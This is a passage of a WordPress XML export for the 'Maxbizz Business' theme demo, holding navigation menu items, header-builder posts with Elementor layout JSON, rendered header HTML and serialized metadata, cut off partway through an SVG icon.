		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1551/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1551/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1551</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1551]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>21</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1555]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[977]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-1/</link>
		<pubDate>Fri, 17 Jul 2020 08:34:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=7</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
			<a href="#" role="button">
						FREE QUOTE
					</a>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 0
				</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>7</wp:post_id>
		<wp:post_date><![CDATA[2020-07-17 08:34:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-17 08:34:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8d39a3f","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"13","right":"0","bottom":"13","left":"0","isLinked":false}},"elements":[{"id":"88d13f7","elType":"column","settings":{"_column_size":50,"_inline_size":25},"elements":[{"id":"fd8c778","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"f0b1296","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"bbce169","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"dfefc95","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"481a8d7","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_weight":"600","button_text_color":"#1B1D21","background_color":"rgba(255, 143, 62, 0.19)","hover_color":"#FFFFFF","button_background_hover_color":"#FF8F3E","border_border":"solid","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"#FF8F3E","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"text_padding":{"unit":"px","top":"16","right":"29","bottom":"16","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"58","isLinked":false},"typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"a79077e","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#272933","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed"},"elements":[{"id":"3c16631","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"471e1f7","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#FE8423","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""}},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"c60b06b","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"1ca8a66","elType":"widget","settings":{"icon_color":"#FFFFFF"},"elements":[],"widgetType":"icart"},{"id":"a1e6544","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isearch"},{"id":"f2c8f30","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:17:"_ot_content_align";i:2;s:5:"align";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:2;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:2;s:16:"description_text";i:2;s:8:"position";i:2;s:10:"title_size";i:2;s:13:"selected_icon";i:2;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:2;s:9:"icon_size";i:2;s:6:"rotate";i:2;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:2;s:18:"title_bottom_space";i:2;s:27:"title_typography_typography";i:2;s:26:"title_typography_font_size";i:2;s:28:"title_typography_font_weight";i:2;s:33:"description_typography_typography";i:2;s:32:"description_typography_font_size";i:2;s:34:"description_typography_font_weight";i:2;s:11:"title_color";i:2;s:28:"title_typography_font_family";i:2;s:17:"description_color";i:2;s:34:"description_typography_font_family";i:2;s:28:"title_typography_line_height";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:12:{s:21:"typography_typography";i:1;s:22:"typography_font_weight";i:1;s:17:"button_text_color";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:1:{s:12:"sticky_class";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:2:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Left</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-mobile/</link>
		<pubDate>Fri, 22 May 2020 10:22:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=77</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-business/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
					<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1874"><a href="http://wpdemo.archiwp.com/maxbizz-business/">Home</a></li>
<li id="menu-item-1433"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1537"><a href="http://wpdemo.archiwp.com/maxbizz-business/about-us/">About Us</a></li>
	<li id="menu-item-1559"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Our Services 1</a></li>
	<li id="menu-item-1554"><a href="http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1543"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1544"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/">Our Team</a></li>
	<li id="menu-item-1545"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1541"><a href="http://wpdemo.archiwp.com/maxbizz-business/elements/">Elements</a></li>
	<li id="menu-item-1546"><a href="http://wpdemo.archiwp.com/maxbizz-business/typography/">Typography</a></li>
	<li id="menu-item-1542"><a href="http://wpdemo.archiwp.com/maxbizz-business/faqs/">FAQs</a></li>
	<li id="menu-item-1538"><a href="http://wpdemo.archiwp.com/maxbizz-business/404-2/">404</a></li>
	<li id="menu-item-1539"><a href="http://wpdemo.archiwp.com/maxbizz-business/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1557"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1560"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1558"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1556"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1563"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1555"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Services</a>
<ul>
	<li id="menu-item-1553"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1552"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1551"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1550"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1549"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1548"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1547"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog</a>
<ul>
	<li id="menu-item-1561"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog List</a></li>
	<li id="menu-item-1562"><a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1540"><a href="http://wpdemo.archiwp.com/maxbizz-business/contacts/">Contacts</a></li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>77</wp:post_id>
		<wp:post_date><![CDATA[2020-05-22 10:22:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-22 10:22:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"e7c1045","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"background_background":"classic","background_color":"#282828"},"elements":[{"id":"026b8ab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"447392a","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":1933},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"172f4fe","elType":"column","settings":{"_column_size":50,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":60},"elements":[{"id":"0514b95","elType":"widget","settings":{"icon_color":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f14cf6b","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-22]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:2;s:19:"_inline_size_mobile";i:2;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:2:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-2/</link>
		<pubDate>Thu, 23 Jul 2020 03:53:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=106</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener">
						Instagram
											</a>
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>						
